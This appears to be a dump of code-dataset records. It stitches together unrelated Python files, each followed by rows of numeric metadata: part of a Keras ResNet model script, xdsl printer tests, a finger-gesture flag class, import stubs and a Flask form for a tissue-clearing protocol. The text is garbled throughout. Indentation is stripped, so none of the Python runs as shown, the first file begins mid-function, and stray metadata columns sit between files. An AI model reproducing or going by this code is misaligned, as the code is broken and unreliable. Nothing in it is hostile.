bnF = BatchNormalization(axis=pr_axis, name='bn_f')(fmerge)
rF = Activation('relu', name='a_f')(bnF)
p = AveragePooling2D(pool_size=(16, 16), name='avp_f')(rF)
f = Flatten()(p)
out = Dense(nb_classes, activation='softmax', name='output_softmax')(f)
model = Model(input=inputYUV, output=out)
return model
def get_resnet_xception(input_shape, nb_classes, init, reg, pr_axis, nb_stages):
i = Input(shape=input_shape)
c0i = Convolution2D(128, 3, 3, subsample=(2, 2), border_mode='same', bias=False, init=init, W_regularizer=l2(reg),
name='inp_conv')(i)
b0i = BatchNormalization(axis=pr_axis, name='inp_bn')(c0i)
r0i = Activation('relu', name='inp_ac')(b0i)
stage_start = r0i
for j in range(nb_stages):
if j > 0:
x = BatchNormalization(axis=pr_axis, name='bn_c_{}'.format(j))(stage_start)
x = Activation('relu', name='a_c_{}'.format(j))(x)
else:
x = stage_start
# cs = Convolution2D(32, 1, 1, bias=False, init=init, W_regularizer=l2(reg), name='c_a_{}'.format(j))(x)
# bns = BatchNormalization(axis=pr_axis, name='bn_a_{}'.format(j))(cs)
# acs = Activation('relu', name='a_a_{}'.format(j))(bns)
# cs2 = Convolution2D(32, 3, 3, bias=False, border_mode='same', init=init, W_regularizer=l2(reg),
# name='c_b_{}'.format(j))(acs)
# bns2 = BatchNormalization(axis=pr_axis, name='bn_b{}'.format(j))(cs2)
# acs2 = Activation('relu', name='a_b_{}'.format(j))(bns2)
# cve = Convolution2D(128, 1, 1, init=init, W_regularizer=l2(reg), name='c_c_{}'.format(j))(acs2)
cve = SeparableConvolution2D(128, 3, 3, init=init, pointwise_regularizer=l2(reg), depthwise_regularizer=l2(reg),
border_mode='same')(x)
stage_start = merge([stage_start, cve], mode='sum', name='+_{}'.format(j))
# 16 + 11*24
bnF = BatchNormalization(axis=pr_axis, name='bn_f')(stage_start)
rF = Activation('relu', name='a_f')(bnF)
p = AveragePooling2D(pool_size=(16, 16), name='avp_f')(rF)
f = Flatten()(p)
out = Dense(nb_classes, activation='softmax', name='output_softmax')(f)
model = Model(input=i, output=out)
return model
def get_resnet_baseelu(input_shape, nb_classes, init, reg, pr_axis, nb_stages):
i = Input(shape=input_shape)
# ibn = BatchNormalization(axis=pr_axis, name='inp_bn')(i)
c0i = Convolution2D(96, 5, 5, border_mode='same', init=init, W_regularizer=l2(reg),
name='inp_conv', activation='elu')(i)
c0i2 = Convolution2D(32, 3, 3, subsample=(2, 2), border_mode='same', init=init, W_regularizer=l2(reg),
name='inp_conv2', activation='elu')(c0i)
# b0i = BatchNormalization(axis=pr_axis, name='inp_bn')(c0i)
# r0i = Activation('relu', name='inp_ac')(b0i)
xspots = []
stage_start = c0i2
for j in range(nb_stages):
if j > 0:
# x = Activation('linear',name='xm_{}'.format(j))(stage_start)
# x = MaxPooling2D(pool_size=(1, 1), name='xm_{}'.format(j))(stage_start)
# xspots.append('xm_{}'.format(j))
# x = BatchNormalization(axis=pr_axis, name='bn_c_{}'.format(j))(stage_start)
x = Activation('elu', name='a_c_{}'.format(j))(stage_start)
cs = Convolution2D(32, 1, 1, bias=True, init=init, W_regularizer=l2(reg), name='c_a_{}'.format(j))(x)
else:
cs = Convolution2D(32, 1, 1, bias=True, init=init, W_regularizer=l2(reg), name='c_a_{}'.format(j))(
stage_start)
# bns = BatchNormalization(axis=pr_axis, name='bn_a_{}'.format(j))(cs)
acs = Activation('elu', name='a_a_{}'.format(j))(cs)
cs2 = Convolution2D(32, 3, 3, bias=True, border_mode='same', init=init, W_regularizer=l2(reg),
name='c_b_{}'.format(j))(acs)
# bns2 = BatchNormalization(axis=pr_axis, name='bn_b{}'.format(j))(cs2)
acs2 = Activation('relu', name='a_b_{}'.format(j))(cs2)
cve = Convolution2D(32, 1, 1, init=init, W_regularizer=l2(reg), name='c_c_{}'.format(j))(acs2)
stage_start = merge([stage_start, cve], mode='sum', name='+_{}'.format(j))
# 16 + 11*24
# bnF = BatchNormalization(axis=pr_axis, name='bn_f')(stage_start)
rF = Activation('elu', name='a_f')(stage_start)
p = AveragePooling2D(pool_size=(16, 16), name='avp_f')(rF)
f = Flatten()(p)
out = Dense(nb_classes, activation='softmax', name='output_softmax', init=init)(f)
model = Model(input=i, output=out)
return model
def get_ror_resnet(input_shape, nb_classes, init, reg, pr_axis, nb_stages):
i = Input(shape=input_shape)
c0i = Convolution2D(128, 3, 3, subsample=(2, 2), border_mode='same', bias=False, init=init, W_regularizer=l2(reg),
name='inp_conv')(i)
b0i = BatchNormalization(axis=pr_axis, name='inp_bn')(c0i)
r0i = Activation('relu', name='inp_ac')(b0i)
xspots = ['inp_ac']
stage_start = r0i
every_5 = r0i
for j in range(nb_stages):
if j > 0:
# x = Activation('linear',name='xm_{}'.format(j))(stage_start)
# x = MaxPooling2D(pool_size=(1, 1), name='xm_{}'.format(j))(stage_start)
# xspots.append('xm_{}'.format(j))
x = BatchNormalization(axis=pr_axis, name='bn_c_{}'.format(j))(stage_start)
x = Activation('relu', name='a_c_{}'.format(j))(x)
cs = Convolution2D(32, 1, 1, bias=False, init=init, W_regularizer=l2(reg), name='c_a_{}'.format(j))(x)
else:
cs = Convolution2D(32, 1, 1, bias=False, init=init, W_regularizer=l2(reg), name='c_a_{}'.format(j))(
stage_start)
bns = BatchNormalization(axis=pr_axis, name='bn_a_{}'.format(j))(cs)
acs = Activation('relu', name='a_a_{}'.format(j))(bns)
cs2 = Convolution2D(32, 3, 3, bias=False, border_mode='same', init=init, W_regularizer=l2(reg),
name='c_b_{}'.format(j))(acs)
bns2 = BatchNormalization(axis=pr_axis, name='bn_b{}'.format(j))(cs2)
acs2 = Activation('relu', name='a_b_{}'.format(j))(bns2)
cve = Convolution2D(128, 1, 1, init=init, W_regularizer=l2(reg), name='c_c_{}'.format(j))(acs2)
xspots.append('c_c_{}'.format(j))
if (j+1) % 3==0:
stage_start = merge([stage_start, cve, every_5], mode='sum', name='+_{}'.format(j))
every_5 = stage_start
else:
stage_start = merge([stage_start, cve], mode='sum', name='+_{}'.format(j))
# 16 + 11*24
bnF = BatchNormalization(axis=pr_axis, name='bn_f')(stage_start)
rF = Activation('relu', name='a_f')(bnF)
p = AveragePooling2D(pool_size=(16, 16), name='avp_f')(rF)
f = Flatten()(p)
out = Dense(nb_classes, activation='softmax', name='output_softmax')(f)
model = Model(input=i, output=out)
return model, xspots
| 57.385204
| 140
| 0.602534
| 3,244
| 22,495
| 3.968557
| 0.05857
| 0.047305
| 0.044275
| 0.057636
| 0.938714
| 0.930247
| 0.924344
| 0.911061
| 0.908498
| 0.908187
| 0
| 0.036611
| 0.215603
| 22,495
| 392
| 141
| 57.385204
| 0.693001
| 0.081885
| 0
| 0.77707
| 0
| 0
| 0.076964
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028662
| false
| 0
| 0.015924
| 0.009554
| 0.073248
| 0.006369
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3b7ec46d29865409d14aa267fab7a5cb49f8fe68
| 6,890
|
py
|
Python
|
tests/printer_test.py
|
anh-ng-21/xdsl
|
bb171400934d8b5a8749b03eb038023d3c9701a7
|
[
"Apache-2.0"
] | null | null | null |
tests/printer_test.py
|
anh-ng-21/xdsl
|
bb171400934d8b5a8749b03eb038023d3c9701a7
|
[
"Apache-2.0"
] | null | null | null |
tests/printer_test.py
|
anh-ng-21/xdsl
|
bb171400934d8b5a8749b03eb038023d3c9701a7
|
[
"Apache-2.0"
] | null | null | null |
from io import StringIO
from xdsl.printer import Printer
from xdsl.parser import Parser
from xdsl.dialects.builtin import Builtin
from xdsl.dialects.arith import *
from xdsl.diagnostic import Diagnostic
def test_forgotten_op():
"""Test that the parsing of an undefined operand raises an exception."""
ctx = MLContext()
arith = Arith(ctx)
lit = Constant.from_int_constant(42, 32)
add = Addi.get(lit, lit)
add.verify()
try:
printer = Printer()
printer.print_op(add)
except KeyError:
return
assert False, "Exception expected"
def test_op_message():
"""Test that an operation message can be printed."""
prog = \
"""module() {
%0 : !i32 = arith.constant() ["value" = 42 : !i32]
%1 : !i32 = arith.addi(%0 : !i32, %0 : !i32)
}"""
expected = \
"""module() {
%0 : !i32 = arith.constant() ["value" = 42 : !i32]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
| Test message
--------------------------------------------------
%1 : !i32 = arith.addi(%0 : !i32, %0 : !i32)
}"""
ctx = MLContext()
arith = Arith(ctx)
builtin = Builtin(ctx)
parser = Parser(ctx, prog)
module = parser.parse_op()
file = StringIO("")
diagnostic = Diagnostic()
diagnostic.add_message(module.ops[0], "Test message")
printer = Printer(stream=file, diagnostic=diagnostic)
printer.print_op(module)
assert file.getvalue().strip() == expected.strip()
def test_two_different_op_messages():
"""Test that an operation message can be printed."""
prog = \
"""module() {
%0 : !i32 = arith.constant() ["value" = 42 : !i32]
%1 : !i32 = arith.addi(%0 : !i32, %0 : !i32)
}"""
expected = \
"""module() {
%0 : !i32 = arith.constant() ["value" = 42 : !i32]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
| Test message 1
--------------------------------------------------
%1 : !i32 = arith.addi(%0 : !i32, %0 : !i32)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
| Test message 2
--------------------------------------------
}"""
ctx = MLContext()
arith = Arith(ctx)
builtin = Builtin(ctx)
parser = Parser(ctx, prog)
module = parser.parse_op()
file = StringIO("")
diagnostic = Diagnostic()
diagnostic.add_message(module.ops[0], "Test message 1")
diagnostic.add_message(module.ops[1], "Test message 2")
printer = Printer(stream=file, diagnostic=diagnostic)
printer.print_op(module)
assert file.getvalue().strip() == expected.strip()
def test_two_same_op_messages():
"""Test that an operation message can be printed."""
prog = \
"""module() {
%0 : !i32 = arith.constant() ["value" = 42 : !i32]
%1 : !i32 = arith.addi(%0 : !i32, %0 : !i32)
}"""
expected = \
"""module() {
%0 : !i32 = arith.constant() ["value" = 42 : !i32]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
| Test message 1
--------------------------------------------------
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
| Test message 2
--------------------------------------------------
%1 : !i32 = arith.addi(%0 : !i32, %0 : !i32)
}"""
ctx = MLContext()
arith = Arith(ctx)
builtin = Builtin(ctx)
parser = Parser(ctx, prog)
module = parser.parse_op()
file = StringIO("")
diagnostic = Diagnostic()
printer = Printer(stream=file, diagnostic=diagnostic)
diagnostic.add_message(module.ops[0], "Test message 1")
diagnostic.add_message(module.ops[0], "Test message 2")
printer.print_op(module)
assert file.getvalue().strip() == expected.strip()
def test_op_message_with_region():
"""Test that an operation message can be printed on an operation with a region."""
prog = \
"""module() {
%0 : !i32 = arith.constant() ["value" = 42 : !i32]
%1 : !i32 = arith.addi(%0 : !i32, %0 : !i32)
}"""
expected = \
"""\
module() {
^^^^^^^^
| Test
--------
%0 : !i32 = arith.constant() ["value" = 42 : !i32]
%1 : !i32 = arith.addi(%0 : !i32, %0 : !i32)
}"""
ctx = MLContext()
arith = Arith(ctx)
builtin = Builtin(ctx)
parser = Parser(ctx, prog)
module = parser.parse_op()
file = StringIO("")
diagnostic = Diagnostic()
printer = Printer(stream=file, diagnostic=diagnostic)
diagnostic.add_message(module, "Test")
printer.print_op(module)
assert file.getvalue().strip() == expected.strip()
def test_op_message_with_region_and_overflow():
"""
Test that an operation message can be printed on an operation with a region,
where the message is bigger than the operation.
"""
prog = \
"""module() {
%0 : !i32 = arith.constant() ["value" = 42 : !i32]
%1 : !i32 = arith.addi(%0 : !i32, %0 : !i32)
}"""
expected = \
"""\
module() {
^^^^^^^^-------
| Test message
---------------
%0 : !i32 = arith.constant() ["value" = 42 : !i32]
%1 : !i32 = arith.addi(%0 : !i32, %0 : !i32)
}"""
ctx = MLContext()
arith = Arith(ctx)
builtin = Builtin(ctx)
parser = Parser(ctx, prog)
module = parser.parse_op()
file = StringIO("")
diagnostic = Diagnostic()
printer = Printer(stream=file, diagnostic=diagnostic)
diagnostic.add_message(module, "Test message")
printer.print_op(module)
assert file.getvalue().strip() == expected.strip()
def test_diagnostic():
"""
Test that an operation message can be printed on an operation with a region,
where the message is bigger than the operation.
"""
prog = \
"""module() {
%0 : !i32 = arith.constant() ["value" = 42 : !i32]
%1 : !i32 = arith.addi(%0 : !i32, %0 : !i32)
}"""
expected = \
"""\
Exception: test message
module() {
^^^^^^^^-------
| Test message
---------------
%0 : !i32 = arith.constant() ["value" = 42 : !i32]
%1 : !i32 = arith.addi(%0 : !i32, %0 : !i32)
}"""
ctx = MLContext()
arith = Arith(ctx)
builtin = Builtin(ctx)
parser = Parser(ctx, prog)
module = parser.parse_op()
diag = Diagnostic()
diag.add_message(module, "Test")
try:
diag.raise_exception("test message", module)
except Exception as e:
assert str(e)
def test_print_costum_name():
"""
Test that an SSAValue, that is a name and not a number, reserves that name
"""
prog = \
"""module() {
%i : !i32 = arith.constant() ["value" = 42 : !i32]
%213 : !i32 = arith.addi(%i : !i32, %i : !i32)
}"""
expected = \
"""\
module() {
%i : !i32 = arith.constant() ["value" = 42 : !i32]
%0 : !i32 = arith.addi(%i : !i32, %i : !i32)
}"""
ctx = MLContext()
arith = Arith(ctx)
builtin = Builtin(ctx)
parser = Parser(ctx, prog)
module = parser.parse_op()
file = StringIO("")
printer = Printer(stream=file)
printer.print_op(module)
assert file.getvalue().strip() == expected.strip()
| 25.805243
| 86
| 0.537446
| 777
| 6,890
| 4.700129
| 0.113256
| 0.040526
| 0.061336
| 0.080504
| 0.802848
| 0.796002
| 0.796002
| 0.785871
| 0.758762
| 0.758762
| 0
| 0.044557
| 0.228012
| 6,890
| 266
| 87
| 25.902256
| 0.642038
| 0.088389
| 0
| 0.715517
| 0
| 0
| 0.031644
| 0
| 0
| 0
| 0
| 0
| 0.068966
| 1
| 0.068966
| false
| 0
| 0.051724
| 0
| 0.12931
| 0.137931
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8e8b11a97e7dcaf62ef34fe082a41339d43e98f7
| 150
|
py
|
Python
|
thermal_barrierlife_prediction/__init__.py
|
SabrinaRichter/thermal_barrierlife_prediction
|
bb90168119a4074f00fb436ca74072c26797d073
|
[
"BSD-3-Clause"
] | null | null | null |
thermal_barrierlife_prediction/__init__.py
|
SabrinaRichter/thermal_barrierlife_prediction
|
bb90168119a4074f00fb436ca74072c26797d073
|
[
"BSD-3-Clause"
] | null | null | null |
thermal_barrierlife_prediction/__init__.py
|
SabrinaRichter/thermal_barrierlife_prediction
|
bb90168119a4074f00fb436ca74072c26797d073
|
[
"BSD-3-Clause"
] | null | null | null |
from thermal_barrierlife_prediction.estimator_cnn import EstimatorCNN
from thermal_barrierlife_prediction.ensemble_estimator import EnsembleEstimator
| 50
| 79
| 0.933333
| 16
| 150
| 8.375
| 0.625
| 0.164179
| 0.328358
| 0.477612
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.053333
| 150
| 2
| 80
| 75
| 0.943662
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8e90f6f5d289efeb49c55dc0a463d0288094364b
| 1,628
|
py
|
Python
|
preprocess/finger_flag.py
|
congtranv/Unified-Gesture-and-Fingertip-Detection
|
5606c2afed462d0bf5686b10c441a6b7d0dbc7ad
|
[
"MIT"
] | 200
|
2019-09-18T08:18:25.000Z
|
2022-03-21T14:52:46.000Z
|
preprocess/finger_flag.py
|
congtranv/Unified-Gesture-and-Fingertip-Detection
|
5606c2afed462d0bf5686b10c441a6b7d0dbc7ad
|
[
"MIT"
] | 15
|
2019-10-09T08:07:41.000Z
|
2022-03-14T08:40:30.000Z
|
preprocess/finger_flag.py
|
congtranv/Unified-Gesture-and-Fingertip-Detection
|
5606c2afed462d0bf5686b10c441a6b7d0dbc7ad
|
[
"MIT"
] | 43
|
2019-10-06T12:25:02.000Z
|
2022-03-09T05:01:55.000Z
|
class Finger:
def __int__(self):
pass
@staticmethod
def SingleOne():
thumb = False
index = True
middle = False
ring = False
pinky = False
return thumb, index, middle, ring, pinky
@staticmethod
def SingleTwo():
thumb = False
index = True
middle = True
ring = False
pinky = False
return thumb, index, middle, ring, pinky
@staticmethod
def SingleThree():
thumb = False
index = True
middle = True
ring = True
pinky = False
return thumb, index, middle, ring, pinky
@staticmethod
def SingleFour():
thumb = False
index = True
middle = True
ring = True
pinky = True
return thumb, index, middle, ring, pinky
@staticmethod
def SingleFive():
thumb = True
index = True
middle = True
ring = True
pinky = True
return thumb, index, middle, ring, pinky
@staticmethod
def SingleSix():
thumb = True
index = False
middle = False
ring = False
pinky = True
return thumb, index, middle, ring, pinky
@staticmethod
def SingleSeven():
thumb = True
index = True
middle = False
ring = False
pinky = True
return thumb, index, middle, ring, pinky
@staticmethod
def SingleEight():
thumb = True
index = True
middle = False
ring = False
pinky = False
return thumb, index, middle, ring, pinky
| 21.421053
| 48
| 0.525184
| 158
| 1,628
| 5.386076
| 0.14557
| 0.141011
| 0.150411
| 0.206816
| 0.836663
| 0.814336
| 0.814336
| 0.780259
| 0.780259
| 0.693302
| 0
| 0
| 0.408477
| 1,628
| 75
| 49
| 21.706667
| 0.883697
| 0
| 0
| 0.820896
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.134328
| false
| 0.014925
| 0
| 0
| 0.268657
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8ea7d24f62535a29f829fdf5934f2e9e8bc2ed32
| 98
|
py
|
Python
|
rl_trainer/agent/replay_buffer/__init__.py
|
Roboy/nips-2018-ai-for-prosthetics
|
acb69f267a0cc852842828edbbfb47d1840c0a17
|
[
"BSD-3-Clause"
] | 3
|
2018-08-31T15:04:53.000Z
|
2019-07-13T01:11:10.000Z
|
rl_trainer/agent/replay_buffer/__init__.py
|
Roboy/nips-2018-ai-for-prosthetics
|
acb69f267a0cc852842828edbbfb47d1840c0a17
|
[
"BSD-3-Clause"
] | null | null | null |
rl_trainer/agent/replay_buffer/__init__.py
|
Roboy/nips-2018-ai-for-prosthetics
|
acb69f267a0cc852842828edbbfb47d1840c0a17
|
[
"BSD-3-Clause"
] | null | null | null |
from .replay_buffer import ReplayBuffer
from .in_memory_replay_buffer import InMemoryReplayBuffer
| 32.666667
| 57
| 0.897959
| 12
| 98
| 7
| 0.666667
| 0.285714
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081633
| 98
| 2
| 58
| 49
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d9204ab65ce483dde88e5c2b4c89472b1725ef3e
| 47
|
py
|
Python
|
pyles/widgets/__init__.py
|
unlikelymaths/pyles
|
bb59f8753528c4f14c2d4fcd8c165f885e49426e
|
[
"MIT"
] | null | null | null |
pyles/widgets/__init__.py
|
unlikelymaths/pyles
|
bb59f8753528c4f14c2d4fcd8c165f885e49426e
|
[
"MIT"
] | null | null | null |
pyles/widgets/__init__.py
|
unlikelymaths/pyles
|
bb59f8753528c4f14c2d4fcd8c165f885e49426e
|
[
"MIT"
] | null | null | null |
import widgets.image_widget
import widgets.util
| 23.5
| 27
| 0.893617
| 7
| 47
| 5.857143
| 0.714286
| 0.634146
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.06383
| 47
| 2
| 28
| 23.5
| 0.931818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d9220ca81f68e37f572f33e7e535034a8c806f29
| 54,469
|
py
|
Python
|
lightserv/clearing/forms.py
|
BrainCOGS/lightserv
|
a47bfb911f095030d811b755acb458c71f18baa2
|
[
"BSD-3-Clause"
] | null | null | null |
lightserv/clearing/forms.py
|
BrainCOGS/lightserv
|
a47bfb911f095030d811b755acb458c71f18baa2
|
[
"BSD-3-Clause"
] | null | null | null |
lightserv/clearing/forms.py
|
BrainCOGS/lightserv
|
a47bfb911f095030d811b755acb458c71f18baa2
|
[
"BSD-3-Clause"
] | null | null | null |
from flask_wtf import FlaskForm
from wtforms import SubmitField, TextAreaField, StringField
from wtforms.fields.html5 import (DateField,
DateTimeLocalField)
from wtforms.validators import DataRequired, Length, InputRequired, ValidationError, Optional
from flask import Markup
datetimeformat='%Y-%m-%dT%H:%M' # To get form.field.data to work. Does not work with the default (bug)
def OptionalDateField(description='',validators=[]):
""" A custom field that makes the DateField optional """
validators.append(Optional())
field = DateField(description,validators)
return field
def OptionalDateTimeLocalField(description='',validators=[],format=datetimeformat):
""" A custom field that makes the DateTimeLocalField optional
and applies a specific formatting to fix a bug in the default formatting """
validators.append(Optional())
field = DateTimeLocalField(description,validators,format=format)
return field
class iDiscoPlusImmunoForm(FlaskForm):
""" The form for entering clearing information """
title = 'iDISCO+ Immunostaining'
exp_notes = TextAreaField('Experiment Notes: If anything unusual happened during the \
experiment that might affect clearing, please note it here.',validators=[Length(max=500)])
exp_notes_submit = SubmitField('Update')
""" Dehydration """
dehydr_date = OptionalDateField('Dehydration')
dehydr_date_submit = SubmitField('Push date to calendar (optional)')
time_dehydr_pbs_wash1 = OptionalDateTimeLocalField('1xPBS 30 min R@RT')
time_dehydr_pbs_wash1_submit = SubmitField('Update')
dehydr_pbs_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
dehydr_pbs_wash1_notes_submit = SubmitField('Update Notes')
time_dehydr_pbs_wash2 = OptionalDateTimeLocalField('2xPBS 30 min R@RT')
time_dehydr_pbs_wash2_submit = SubmitField('Update')
dehydr_pbs_wash2_notes = TextAreaField('Notes',validators=[Length(max=100)])
dehydr_pbs_wash2_notes_submit = SubmitField('Update Notes')
time_dehydr_pbs_wash3 = OptionalDateTimeLocalField('3xPBS 30 min R@RT')
time_dehydr_pbs_wash3_submit = SubmitField('Update')
dehydr_pbs_wash3_notes = TextAreaField('Notes',validators=[Length(max=100)])
dehydr_pbs_wash3_notes_submit = SubmitField('Update Notes')
time_dehydr_methanol_20percent_wash1 = OptionalDateTimeLocalField('20% methanol R@RTx1hr')
time_dehydr_methanol_20percent_wash1_submit = SubmitField('Update')
dehydr_methanol_20percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=200)])
dehydr_methanol_20percent_wash1_notes_submit = SubmitField('Update Notes')
time_dehydr_methanol_40percent_wash1 = OptionalDateTimeLocalField('40% methanol R@RTx1hr')
time_dehydr_methanol_40percent_wash1_submit = SubmitField('Update')
dehydr_methanol_40percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=200)])
dehydr_methanol_40percent_wash1_notes_submit = SubmitField('Update Notes')
time_dehydr_methanol_60percent_wash1 = OptionalDateTimeLocalField('60% methanol R@RTx1hr')
time_dehydr_methanol_60percent_wash1_submit = SubmitField('Update')
dehydr_methanol_60percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=200)])
dehydr_methanol_60percent_wash1_notes_submit = SubmitField('Update Notes')
time_dehydr_methanol_80percent_wash1 = OptionalDateTimeLocalField('80% methanol R@RTx1hr')
time_dehydr_methanol_80percent_wash1_submit = SubmitField('Update')
dehydr_methanol_80percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=200)])
dehydr_methanol_80percent_wash1_notes_submit = SubmitField('Update Notes')
time_dehydr_methanol_100percent_wash1 = OptionalDateTimeLocalField('100% methanol R@RTx1hr (first hour)')
time_dehydr_methanol_100percent_wash1_submit = SubmitField('Update')
dehydr_methanol_100percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=200)])
dehydr_methanol_100percent_wash1_notes_submit = SubmitField('Update Notes')
time_dehydr_methanol_100percent_wash2 = OptionalDateTimeLocalField('100% methanol R@RTx1hr (second hour)')
time_dehydr_methanol_100percent_wash2_submit = SubmitField('Update')
dehydr_methanol_100percent_wash2_notes = TextAreaField('Notes',validators=[Length(max=200)])
dehydr_methanol_100percent_wash2_notes_submit = SubmitField('Update Notes')
time_dehydr_peroxide_wash1 = OptionalDateTimeLocalField('5% peroxide (30%) in methanol(100%) O/N R@RT (1 part peroxide5 parts methanol)')
time_dehydr_peroxide_wash1_submit = SubmitField('Update')
dehydr_peroxide_wash1_notes = TextAreaField('Notes',validators=[Length(max=200)])
dehydr_peroxide_wash1_notes_submit = SubmitField('Update Notes')
""" Rehydration """
rehydr_date = OptionalDateField('Rehydration')
rehydr_date_submit = SubmitField('Push date to calendar (optional)')
time_rehydr_methanol_100percent_wash1 = OptionalDateTimeLocalField('100% methanol R@RTx1hr')
time_rehydr_methanol_100percent_wash1_submit = SubmitField('Update')
rehydr_methanol_100percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=200)])
rehydr_methanol_100percent_wash1_notes_submit = SubmitField('Update Notes')
time_rehydr_methanol_80percent_wash1 = OptionalDateTimeLocalField('80% methanol R@RTx1hr')
time_rehydr_methanol_80percent_wash1_submit = SubmitField('Update')
rehydr_methanol_80percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=200)])
rehydr_methanol_80percent_wash1_notes_submit = SubmitField('Update Notes')
time_rehydr_methanol_60percent_wash1 = OptionalDateTimeLocalField('60% methanol R@RTx1hr')
time_rehydr_methanol_60percent_wash1_submit = SubmitField('Update')
rehydr_methanol_60percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=200)])
rehydr_methanol_60percent_wash1_notes_submit = SubmitField('Update Notes')
time_rehydr_methanol_40percent_wash1 = OptionalDateTimeLocalField('40% methanol R@RTx1hr')
time_rehydr_methanol_40percent_wash1_submit = SubmitField('Update')
rehydr_methanol_40percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=200)])
rehydr_methanol_40percent_wash1_notes_submit = SubmitField('Update Notes')
time_rehydr_methanol_20percent_wash1 = OptionalDateTimeLocalField('20% methanol R@RTx1hr')
time_rehydr_methanol_20percent_wash1_submit = SubmitField('Update')
rehydr_methanol_20percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=200)])
rehydr_methanol_20percent_wash1_notes_submit = SubmitField('Update Notes')
time_rehydr_pbs_wash1 = OptionalDateTimeLocalField('PBS R@RTx1hr')
time_rehydr_pbs_wash1_submit = SubmitField('Update')
rehydr_pbs_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
rehydr_pbs_wash1_notes_submit = SubmitField('Update Notes')
time_rehydr_sodium_azide_wash1 = OptionalDateTimeLocalField('0.2%TritonX-100/1xPBS/0.1% sodium azide R@RTx1hr (first hour)')
time_rehydr_sodium_azide_wash1_submit = SubmitField('Update')
rehydr_sodium_azide_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
rehydr_sodium_azide_wash1_notes_submit = SubmitField('Update Notes')
time_rehydr_sodium_azide_wash2 = OptionalDateTimeLocalField('0.2%TritonX-100/1xPBS/0.1% sodium azide R@RTx1hr (second hour)')
time_rehydr_sodium_azide_wash2_submit = SubmitField('Update')
rehydr_sodium_azide_wash2_notes = TextAreaField('Notes',validators=[Length(max=100)])
rehydr_sodium_azide_wash2_notes_submit = SubmitField('Update Notes')
time_rehydr_glycine_wash1 = OptionalDateTimeLocalField('20%DMSO/0.3M glycine/0.2% TritonX-100/0.1%sodium azide/1xPBS R@37C for 2 days')
time_rehydr_glycine_wash1_submit = SubmitField('Update')
rehydr_glycine_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
rehydr_glycine_wash1_notes_submit = SubmitField('Update Notes')
""" Blocking """
blocking_date = OptionalDateField('Blocking')
blocking_date_submit = SubmitField('Push date to calendar (optional)')
time_blocking_start_roomtemp = OptionalDateTimeLocalField('Sample R@RT for ~1.5hrs')
time_blocking_start_roomtemp_submit = SubmitField('Update')
